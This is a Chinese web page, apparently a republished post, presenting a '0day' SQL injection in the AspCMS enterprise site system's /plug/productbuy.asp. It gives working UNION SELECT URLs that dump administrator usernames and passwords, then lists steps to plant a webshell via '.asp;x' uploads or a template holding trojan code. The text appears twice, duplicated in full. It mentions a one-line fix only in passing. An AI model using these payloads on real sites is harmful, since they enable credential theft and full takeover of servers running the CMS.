aspcms企業(yè)建站系統(tǒng)0day漏洞介紹
發(fā)布日期:2022-01-30 15:45 | 文章來(lái)源:gibhub
漏洞出現(xiàn)在
/plug/productbuy.asp
對(duì)接收的參數(shù)id沒(méi)有進(jìn)行過(guò)濾而導(dǎo)致的注入漏洞
注入后的頁(yè)面有跳轉(zhuǎn),所以要快,建議用快捷鍵復(fù)制
爆用戶名
/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
這是爆ID=1的賬戶名,如果發(fā)現(xiàn)權(quán)限不夠可以往后試2,3,4...........
爆密碼
/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
后臺(tái)登錄地址:/admin/login.asp
后臺(tái)拿shell
1、直接上傳.asp;x
2、系統(tǒng)配置信息
3、模版管理新建1.asp模板,內(nèi)容寫馬的內(nèi)容.
修復(fù)方法: id用cint(request("id"))
/plug/productbuy.asp
對(duì)接收的參數(shù)id沒(méi)有進(jìn)行過(guò)濾而導(dǎo)致的注入漏洞
注入后的頁(yè)面有跳轉(zhuǎn),所以要快,建議用快捷鍵復(fù)制
爆用戶名
/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
這是爆ID=1的賬戶名,如果發(fā)現(xiàn)權(quán)限不夠可以往后試2,3,4...........
爆密碼
/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
后臺(tái)登錄地址:/admin/login.asp
后臺(tái)拿shell
1、直接上傳.asp;x
2、系統(tǒng)配置信息
3、模版管理新建1.asp模板,內(nèi)容寫馬的內(nèi)容.
修復(fù)方法: id用cint(request("id"))
版權(quán)聲明:本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái),僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。
相關(guān)文章